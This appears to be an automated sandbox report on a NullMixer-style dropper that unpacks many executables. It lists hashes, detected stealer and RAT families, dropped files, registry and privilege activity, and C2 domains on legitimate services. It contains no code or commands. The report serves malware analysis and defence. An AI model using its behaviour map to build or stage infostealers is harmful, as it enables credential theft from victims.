SHA256 b16ff6569369cbf777c789b1b98c1151a7cc062bdfaf55a5856dbead16ba9188
SHA512 d3ce93bc6b6bc804d74414e951c6139b968fd23e25505432f564446e1ee652272ace150e1e540ace377418c4b488792d7e6d05a4c9a9908772ae659433014b8f

memory/4360-407-0x0000000002C60000-0x0000000002CF2000-memory.dmp

memory/4360-408-0x0000000002D00000-0x0000000003B18000-memory.dmp

memory/4360-409-0x0000000003B20000-0x0000000003BAB000-memory.dmp

memory/4360-410-0x0000000003BC0000-0x0000000003C47000-memory.dmp

memory/4360-413-0x0000000003BC0000-0x0000000003C47000-memory.dmp

memory/4360-414-0x00000000002A0000-0x00000000002A1000-memory.dmp

memory/4360-415-0x00000000002B0000-0x00000000002B4000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 d37ad49deab276c2897954fad0370cd8
SHA1 a09994f93020061b7017cd174a001359ae89b664
SHA256 c1866e38f077a37fbf00c04aa1c476cdc4c132389d4a34c0b9be59cf66a92313
SHA512 0d4dc8410870ab1c44baf6ac518d0c5618d6f567ecefc38ed4b0b907a5ea365d96642dad8a0db934ba2093d4dad3eaeefe4392f49a70229192938631a3b00f8d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 563f4a8c0163a3a4403f13e58b40b468
SHA1 84ee1ee27d2d0bd5734cc8837814bd3856b6b648
SHA256 0c67b82c4815d1765c3060bc2794ce69fbf8905006cb5859da759a724160f3af
SHA512 deb63061243a066a02c94aa6fc24b53fbff33868a498d70070b82340e27aa77a22e0faae68cab9c63420e6d3a1f01a3a0312a604e6d64cbf3942564df70b20f8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 3831bf7ac62bc1e3b653f8f8ca5d1e4e
SHA1 e3ca71f4560b8fb7d8c1b291eb3982365c4321b1
SHA256 134450ab6468a0e4bf0584d7cf843ee9fbc53863f5778ba5f4aff81e029d3ba6
SHA512 687727de76d0218c93d8304387de28c486613d882bc7d41a97b802690e257f8fc293523b1ac457631e136acd7754d3364405816acd3a56d48973b97d798021af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 72720449b4d999a1f47220fe8ac28129
SHA1 83b1a464102474c779575b7c84d315a6d40bc911
SHA256 9b929637db1cec44e4848c7e606026ef89f811288108003914dfafea1d2f0a9c
SHA512 070e4894ef2c065d2508e995ff85ccf15005aa5a698ceda8ab5a69b028471f8ebb33184ee878066e1552f45777ed490c644abc1aa8eb72b0a19797b8f7790341

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-22 07:31

Reported

2024-11-22 07:33

Platform

win7-20241010-en

Max time kernel

119s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1262fd911d3e6320.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu122f7469b214cb59.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12465fe68f85b6156.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu123e05ebe43921.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu126011caea28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12b275ee70c7e913.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu128b511c77e8c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu120bfbc2443b3b5d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12ca1c119bc29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12493eba7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu124078ed79bdbd5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12912263469836d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VPJ0P.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-8FFJH.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu126011caea28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu128b511c77e8c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12912263469836d.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1262fd911d3e6320.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1262fd911d3e6320.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu122f7469b214cb59.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu122f7469b214cb59.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12465fe68f85b6156.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12465fe68f85b6156.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu123e05ebe43921.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu123e05ebe43921.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu126011caea28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu126011caea28.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu128b511c77e8c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu128b511c77e8c.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12ca1c119bc29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12ca1c119bc29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12493eba7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12493eba7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu124078ed79bdbd5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu124078ed79bdbd5.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12912263469836d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12912263469836d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VPJ0P.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VPJ0P.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VPJ0P.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VPJ0P.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu122f7469b214cb59.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-8FFJH.tmp\Thu125e541847539.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12465fe68f85b6156.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu123e05ebe43921.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12912263469836d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12493eba7a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu126011caea28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12912263469836d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12ca1c119bc29.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-VPJ0P.tmp\Thu125e541847539.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu128b511c77e8c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu126011caea28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu128b511c77e8c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1262fd911d3e6320.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu124078ed79bdbd5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-8FFJH.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12ca1c119bc29.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu122f7469b214cb59.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12b275ee70c7e913.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2128 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe
PID 2128 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe
PID 2128 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe
PID 2128 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe
PID 2128 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe
PID 2128 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe
PID 2128 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe
PID 2136 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2136 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2136 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2136 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2136 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2136 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2136 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2136 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2136 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2136 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2136 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2136 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2136 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2136 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2628 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
